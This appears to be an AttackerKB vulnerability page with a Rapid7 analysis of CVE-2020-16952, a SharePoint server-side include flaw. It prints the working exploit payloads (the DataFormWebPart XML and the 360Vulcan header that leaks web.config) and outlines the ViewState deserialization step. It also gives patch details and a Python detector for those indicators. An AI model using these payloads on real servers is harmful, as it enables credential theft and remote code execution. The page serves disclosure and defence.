Attacker Value: Very High (2 users assessed)
Exploitability: High (2 users assessed)
User Interaction: Unknown
Privileges Required: Unknown
Attack Vector: Unknown

CVE-2020-16952 — Microsoft SharePoint Remote Code Execution Vulnerabilities

Disclosure Date: October 16, 2020
Exploited in the Wild
Reported by captainGeech42

Description

A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16951.


3 Ratings
Technical Analysis

Please see the Rapid7 analysis. A Metasploit module will be released.

2 Ratings
Technical Analysis

There were a lot of vulns out this week, a number of which got quite a bit more news cycle attention than this one (lookin’ at you, Bad Neighbor). Unlike a few of those higher-hype bugs, however, this one is an active threat. Like other significant vulnerabilities from this year, the fact that this is authenticated isn’t a barrier for attackers and alas, shouldn’t be a consolation for those tasked with securing SharePoint environments.

@tsellers-r7 has a really great Twitter thread here on the number of publicly exposed, vulnerable SharePoint installations and version/support complexities that defenders may not realize they need to take into account. Metasploit Framework will also have a module out in next week’s release.

General Information

Vendors

  • Microsoft

Products

  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Server 2019
  • Microsoft SharePoint Foundation 2013 Service Pack 1

Additional Info

Technical Analysis

Update October 14, 2020: A Metasploit module exploiting CVE-2020-16952 has been published and contains remote check logic as well as supplementary exploitation details.

Description

On Tuesday, October 13, as part of the October 2020 Patch Tuesday release, Microsoft published a security advisory for CVE-2020-16952, a server-side include (SSI) vulnerability in Microsoft SharePoint. The bug is exploitable by an authenticated user with page creation privileges, which is a standard permission in SharePoint, and allows the leaking of an arbitrary file, notably the application’s web.config file, which can be used to trigger remote code execution (RCE) via .NET deserialization. CVE-2020-16952 carries a CVSSv3 base score of 8.6.

Steven Seeley, the researcher who discovered and disclosed the vulnerability to Microsoft, published an advisory of his own with the vulnerability’s technical details. Seeley’s advisory includes a proof-of-concept (PoC) Python exploit that leverages the vulnerability to leak the web.config file, extract the ViewState validation key, and forge a malicious ViewState that will be deserialized by the application. Using a .NET gadget chain from ysoserial.net, the exploit is able to execute an arbitrary command as the SharePoint user.

An easily available proof-of-concept makes CVE-2020-16952 an impending threat. There are no reports of exploitation in the wild as of October 13, 2020.

Affected products

  • Microsoft SharePoint Foundation 2013 Service Pack 1
  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Server 2019

Rapid7 analysis

CVE-2020-16952 exists within the CreateChildControls() method in the Microsoft.SharePoint.WebPartPages.DataFormWebPart class and is well-documented in Seeley’s exploit.

Exploitation of the vulnerability is straightforward and begins with NTLM authentication over HTTP. After authentication has succeeded, an HTTP PUT request containing the following XML is sent to /poc.aspx (or any page the attacker is able to create). This is used to establish the source of the server-side include (SSI), which is the HTTP header 360Vulcan (or a header of the attacker’s choosing).

<WebPartPages:DataFormWebPart runat="server">
  <ParameterBindings>
    <ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
  </ParameterBindings>
  <xsl>
    <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
      <xsl:param name="ssi" />
      <xsl:template match="/">
        <xsl:value-of select="$ssi" disable-output-escaping="yes" />
      </xsl:template>
    </xsl:stylesheet>
  </xsl>
</WebPartPages:DataFormWebPart>


Next, a GET request containing the 360Vulcan header is sent to /poc.aspx in order to trigger the SSI and leak SharePoint’s web.config file. The header can be seen below.

360Vulcan: <form runat="server" /><!--#include virtual="/web.config"-->


Finally, using the ViewState validation key extracted from web.config, the attacker is able to forge their own ViewState containing ysoserial.net gadgets and execute a command of their choosing.

The patch for CVE-2020-16952 enables blockServerSideIncludes in the VerifyControlOnSafeList() call within CreateChildControls():

- EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, false);
+ EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, true);
internal static void VerifyControlOnSafeList(string dscXml, RegisterDirectiveManager registerDirectiveManager, SPWeb web, bool blockServerSideIncludes = false)
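Review bot: the signature shown on the last line still defaults blockServerSideIncludes to false, so only this one call site in CreateChildControls() opts into the SSI check; consider flipping the default to true (or auditing every other VerifyControlOnSafeList() caller) so that a future caller that omits the argument does not silently re-enable server-side includes.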

SharePoint is a high-value attack target and has seen a number of high-severity vulnerabilities patched in recent months. It is likely that active exploitation will occur within a relatively short time frame; it was trivial for Rapid7 researchers to validate the vulnerability’s exploitability and weaponize Seeley’s PoC.

Guidance

Since an exploit has been released, Rapid7 researchers recommend applying Microsoft’s patch immediately. CVE-2020-16952 poses higher risk for multi-tenant environments—i.e., multiple organizations using the same SharePoint and/or Active Directory environment.

For patching information, please see KB4486694 for SharePoint 2013, KB4486677 for SharePoint 2016, and KB4486676 for SharePoint 2019.

Defenders can detect this exploit variant by identifying HTTP headers containing the string runat="server", as well as auditing SharePoint page creations.
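As an added example (not part of the AttackerKB page or the Rapid7 analysis), the following Python detector applies both indicators from the guidance above to raw HTTP request heads: header values carrying runat="server" or an SSI include directive, and PUT requests that create .aspx pages (the page-creation step of the walkthrough). The request format and sample traffic are constructed for the example; the 360Vulcan header and /poc.aspx path are the values quoted in the analysis.

```python
import re
from typing import Dict, List, Tuple

# Indicators taken from the analysis above: the exploit smuggles <form runat="server" />
# and an SSI <!--#include ...--> directive inside an attacker-chosen request header.
RUNAT_RE = re.compile(r'runat\s*=\s*["\']?\s*server', re.IGNORECASE)
SSI_RE = re.compile(r'<!--\s*#include\s+(?:virtual|file)\s*=', re.IGNORECASE)
ASPX_RE = re.compile(r'\.aspx(?:$|\?)', re.IGNORECASE)

def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Parse a raw HTTP request head ('METHOD /path HTTP/1.1' followed by header lines)."""
    lines = raw.strip().splitlines()
    method, path = lines[0].split()[:2]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block; ignore any body
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers

def inspect_request(method: str, path: str, headers: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one request; an empty list means nothing matched."""
    findings: List[str] = []
    for name, value in headers.items():  # the header name is attacker-chosen, so check all of them
        if RUNAT_RE.search(value):
            findings.append(f'header "{name}" contains runat="server"')
        if SSI_RE.search(value):
            findings.append(f'header "{name}" contains an SSI include directive')
    if method == "PUT" and ASPX_RE.search(path):
        findings.append(f"page creation via PUT to {path}")  # correlate with page-creation audit logs
    return findings

def scan(raw_requests: List[str]) -> List[Tuple[str, List[str]]]:
    """Run inspect_request over raw requests; return (request line, findings) for each hit."""
    hits = []
    for raw in raw_requests:
        method, path, headers = parse_request(raw)
        if findings := inspect_request(method, path, headers):
            hits.append((f"{method} {path}", findings))
    return hits

# Constructed sample traffic (not captured data): a benign GET, the PUT that creates
# the page, and the GET carrying the 360Vulcan header quoted in the analysis.
SAMPLE_REQUESTS = [
    "GET /SitePages/Home.aspx HTTP/1.1\r\nHost: sp.example.test\r\nUser-Agent: Mozilla/5.0\r\n",
    "PUT /poc.aspx HTTP/1.1\r\nHost: sp.example.test\r\nContent-Type: text/xml\r\n",
    "GET /poc.aspx HTTP/1.1\r\nHost: sp.example.test\r\n"
    '360Vulcan: <form runat="server" /><!--#include virtual="/web.config"-->\r\n',
]
```

Calling scan(SAMPLE_REQUESTS) flags the PUT (page creation) and the GET whose header matches both indicators, while the benign request produces no finding.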

References